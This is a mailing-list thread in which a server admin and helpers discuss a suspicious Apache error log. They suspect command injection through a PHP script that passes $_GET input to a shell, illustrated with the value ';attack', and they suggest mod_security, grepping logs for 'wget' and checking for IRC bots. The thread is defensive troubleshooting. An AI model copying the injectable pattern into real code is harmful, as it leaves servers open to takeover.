RE: Weird message in my apache error log
Hello guys,
No, I can't think of any specific application. Yes this web server is running a
couple of php scripts but that's it.
Following your recommendations I have installed mod_security with the set of
standard rules provided in www.modsecurity.org. I will be following up the audit log
for any clues.
Be sure that I have strange files, permissions, or open ports in this box. I run
daily checks and I got the vaccines :-)
Thanks,
Josep SERRANO.
> What does your application do? It looks like it is finding a shell script
> somewhere? We've seen similar things when executing CGI's and not filtering
> the input data so well. The line 22, 24 make me think there is a script
> somewhere rather than arbitrary GET data.
>
>> -----Original Message-----
>> Looks like someone is trying to do arbritary commmand execution. You
>> probably have a script somewhere that says `command $_GET['var']`, and
>> someone is passing ';attack' as var, but it isn't quite working.
>>
>> I suggest using the audit log feature of mod_security, or just grepping
>> through your access logs for anything odd ('wget' is a good search
>> term).
>>
>> You might have a bot on the system, check for any odd network
>> connections, especially to port 6667 (IRC). Also look for www-data owned
>> files in /tmp.
Reply to: